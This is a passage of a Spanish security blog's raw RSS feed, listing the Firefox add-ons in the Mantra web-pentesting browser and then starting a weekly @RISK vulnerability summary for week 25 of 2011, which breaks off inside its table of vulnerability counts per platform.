&lt;ul type="square"&gt;&lt;li class="MsoNormal" style="mso-list: l1 level4 lfo2; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 144.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/dns-cache/"&gt;DNS         Cache&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;li class="MsoNormal" style="mso-list: l1 level3 lfo2; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 108.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;SQL&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;ul type="square"&gt;&lt;li class="MsoNormal" style="mso-list: l1 level4 lfo2; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 144.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/sqlite-manager/"&gt;SQLite         Manager&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/ul&gt;&lt;li class="MsoNormal" style="mso-list: l1 level2 lfo2; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 72.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;Sniffers&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;ul type="square"&gt;&lt;li class="MsoNormal" style="mso-list: l1 level3 lfo2; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 108.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="https://addons.mozilla.org/en-us/firefox/addon/httpfox/"&gt;HTTP Fox&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;li class="MsoNormal" style="mso-list: l1 level2 lfo2; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 72.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;Password&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;ul type="square"&gt;&lt;li class="MsoNormal" style="mso-list: l1 level3 lfo2; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 108.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="https://addons.mozilla.org/es-es/firefox/addon/cryptofox/"&gt;CryptoFox        2.0&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/ul&gt;&lt;/ul&gt;&lt;ul type="disc"&gt;&lt;li class="MsoNormal" style="mso-list: l0 level1 lfo3; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 36.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;Misc&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;ul type="circle"&gt;&lt;li class="MsoNormal" style="mso-list: l0 level2 lfo3; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 72.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;Tweaks and Hacks&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;ul type="square"&gt;&lt;li class="MsoNormal" style="mso-list: l0 level3 lfo3; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 108.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="https://addons.mozilla.org/es-es/firefox/addon/greasemonkey/"&gt;Greasemonkey&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l0 level3 lfo3; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 108.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/noscript/"&gt;Scripts&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;li class="MsoNormal" style="mso-list: l0 level2 lfo3; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 72.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;Malware scanner&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;ul type="square"&gt;&lt;li class="MsoNormal" style="mso-list: l0 level3 lfo3; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 108.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/wot-safe-browsing-tool/"&gt;Web        of Trust&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;li class="MsoNormal" style="mso-list: l0 level2 lfo3; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 72.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;Automation&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;ul type="square"&gt;&lt;li class="MsoNormal" style="mso-list: l0 level3 lfo3; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 108.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="https://addons.mozilla.org/es-es/firefox/addon/imacros-for-firefox/"&gt;iMacros&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;li class="MsoNormal" style="mso-list: l0 level2 lfo3; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 72.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;Others&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;ul type="square"&gt;&lt;li class="MsoNormal" style="mso-list: l0 level3 lfo3; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 108.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="https://addons.mozilla.org/es-ES/firefox/addon/cachetoggle/"&gt;CacheToggle        0.6&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l0 level3 lfo3; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 108.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/url-flipper/"&gt;URL        Flipper&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/ul&gt;&lt;/ul&gt;&lt;ul type="disc"&gt;&lt;li class="MsoNormal" style="mso-list: l2 level1 lfo4; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 36.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;Application Auditing&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;ul type="circle"&gt;&lt;li class="MsoNormal" style="mso-list: l2 level2 lfo4; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 72.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="https://addons.mozilla.org/es-es/firefox/addon/hackbar/"&gt;Hackbar&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l2 level2 lfo4; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 72.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/javascript-deobfuscator/"&gt;JavaScript       Deobfuscator&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l2 level2 lfo4; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 72.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="https://addons.mozilla.org/en-us/firefox/addon/restclient/"&gt;RESTClient&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l2 level2 lfo4; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 72.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="https://addons.mozilla.org/en-us/firefox/addon/tamper-data/"&gt;Tamper       Data&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l2 level2 lfo4; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 72.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/"&gt;Live       HTTP Headers&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l2 level2 lfo4; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 72.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="https://addons.mozilla.org/es-es/firefox/addon/refcontrol/"&gt;RefControl&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l2 level2 lfo4; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 72.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/"&gt;User       Agent Switcher&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l2 level2 lfo4; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 72.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="https://addons.mozilla.org/es-es/firefox/addon/web-developer/"&gt;Web       Developer&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l2 level2 lfo4; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 72.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/dom-inspector-6622/"&gt;DOM       Inspector&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l2 level2 lfo4; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 72.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="https://addons.mozilla.org/en-us/firefox/addon/inspectthis/"&gt;Inspect       This&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l2 level2 lfo4; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 72.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="https://addons.mozilla.org/es-es/firefox/addon/formfox/"&gt;Formfox&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l2 level2 lfo4; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 72.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="http://labs.securitycompass.com/exploit-me/"&gt;Exploit Me&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;ul type="square"&gt;&lt;li class="MsoNormal" style="mso-list: l2 level3 lfo4; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 108.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;Access Me&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l2 level3 lfo4; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 108.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;SQL Inject Me&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l2 level3 lfo4; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 108.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;XSS Me&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;li class="MsoNormal" style="mso-list: l2 level2 lfo4; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 72.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;Cookies&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;ul type="square"&gt;&lt;li class="MsoNormal" style="mso-list: l2 level3 lfo4; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 108.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/"&gt;Cookies        Manager+ 1.5.1&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l2 level3 lfo4; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 108.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/firecookie/"&gt;Firecookie&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/ul&gt;&lt;/ul&gt;&lt;ul type="disc"&gt;&lt;li class="MsoNormal" style="mso-list: l3 level1 lfo5; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 36.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;Proxy&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;ul type="circle"&gt;&lt;li class="MsoNormal" style="mso-list: l3 level2 lfo5; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 72.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="https://addons.mozilla.org/es-es/firefox/addon/foxyproxy-standard/"&gt;FoxyProxy       Standard 2.22.6&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l3 level2 lfo5; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 72.0pt;"&gt;&lt;span style="mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="https://addons.mozilla.org/es-es/firefox/addon/httpfox/"&gt;HttpFox&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/ul&gt;&lt;h2&gt;&lt;span class="MsoHyperlink"&gt;&lt;span style="font-size: 12.0pt; font-weight: normal; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&lt;a href="http://www.getmantra.com/download/index.html" target="_blank"&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;;"&gt;Mantra se encuentra disponible para GNU/Linux, Mac OS X y Microsoft Windows y puedes descargarlo desde este enlace&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="MsoHyperlink"&gt;&lt;span style="font-size: 12.0pt; font-weight: normal;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;&lt;strong&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;;"&gt;Para Mas&amp;nbsp;Información:&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;;"&gt;&lt;br /&gt;
&lt;a href="http://getmantra.com/" target="_blank"&gt;Visita la Pagina Oficial de Mantra&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5967737507322085400-4794301202218333302?l=pramirezh.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pramirezh.blogspot.com/2011/06/mantrafirecat-browser-pentester.html</link><author>noreply@blogger.com (Pablo Ramirez Hoffmann)</author></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5967737507322085400.post-369299876080062556</guid><pubDate>Fri, 17 Jun 2011 02:41:00 +0000</pubDate><atom:updated>2011-06-16T22:41:02.904-04:00</atom:updated><title>Lista de vulnerabilidades semana 25</title><description>&lt;div class="mobile-photo"&gt;&lt;br /&gt;
&lt;div class="MsoPlainText"&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;En esta semana sorprende la cantidad de vulnerabilidades descubiertas en Adobe… en las próximas semanas de seguro se verá una cantidad importante de malware explotando estas fallas, y lo más probable que sea a través de correo electrónico y xss en aplicaciones web.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;______________________________________________________________________&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; @RISK: The Consensus Security Vulnerability Alert&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Week 25 2011&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;______________________________________________________________________&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;Summary of Updates and Vulnerabilities in this Consensus&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;Platform&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Number of Updates and Vulnerabilities&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;- ------------------------&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; -------------------------------------&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;Other Microsoft Products&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 1 (#2)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;Third Party Windows Apps&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 1&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;Linux&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 2&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;Aix&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 1&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoPlainText"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;Unix&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 2&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div 